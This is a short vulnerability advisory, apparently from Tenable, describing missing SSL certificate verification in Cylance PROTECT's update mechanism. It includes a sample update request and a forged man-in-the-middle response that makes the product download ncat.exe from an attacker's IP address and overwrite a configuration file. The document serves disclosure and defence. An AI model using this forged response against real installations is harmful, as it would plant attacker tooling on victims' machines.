[R1] Cylance PROTECT Missing SSL Certificate Verification

While researching Cylance PROTECT for possible plugin coverage, Tenable noticed that the application makes some HTTPs requests without verifying the server's SSL certificate. This allows a man in the middle to intercept and modify the requests and responses. In particular, the response to the following POST request can be modified to cause Cylance PROTECT to download an arbitrary file.

POST https://update.cylance.com/updates HTTP/1.1
Accept: application/json, application/xml, text/json, text/x-json, text/javascript, text/xml
User-Agent: RestSharp/2.0.1460.29
Content-Type: application/json
Content-Length: 3303
Connection: Keep-Alive
Host: update.cylance.com

{"TenantId":"a9b0e890-b4bd-4777-b1a3-5d20db3360ab","Bitness":64,"DeviceId":"4b7bca07-ce3a-464a-9aa9-c643ab0d9c13","FileVersions":[
{"FileName":"CefClient.dll","Version":"1.0.47.550"},
{"FileName":"CefServer.dll","Version":"1.0.47.550"},
{"FileName":"CommonUtils.dll","Version":"5.0.0.2598"},
... truncated ...

A malicious attacker could modify the response to this request to look something like the following:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Mon, 05 Mar 2018 16:12:08 GMT
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 97
Connection: keep-alive

[{ "FileName":"CyProtect.exe.config", "Url":"http://172.26.38.11/ncat.exe", "Version":"7.58.0"}]

Which causes the ncat.exe binary to be written to C:\Program Files\Cylance\Desktop\D\CyProtect.exe.config.